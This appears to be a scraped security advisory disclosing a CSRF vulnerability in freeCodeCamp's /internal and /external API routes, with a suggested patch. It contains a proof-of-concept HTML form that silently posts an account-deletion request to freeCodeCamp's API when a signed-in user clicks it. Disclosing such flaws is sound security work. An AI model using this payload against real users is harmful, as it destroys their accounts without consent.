We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
CSRF vulnerability in the /internal and /external routes
/internal
/external
Use the below code and save it as poc.html
poc.html
<html> <body> <script>history.pushState('', '', '/')</script> <form action="https://api.freecodecamp.org/internal/account/delete" method="POST"> <input type="submit" value="Submit request" /> </form> </body> </html>
Sign in to freeCodeCamp.org
Open the saved page and click on the Submit button.
Your account should now have been deleted.
The problem needs to be patched by removing these routes, and validating the requests instead.
Impact
CSRF vulnerability in the
/internal
and/external
routesPOC
Use the below code and save it as
poc.html
Sign in to freeCodeCamp.org
Open the saved page and click on the Submit button.
Your account should now have been deleted.
Patches
The problem needs to be patched by removing these routes, and validating the requests instead.
Workarounds
References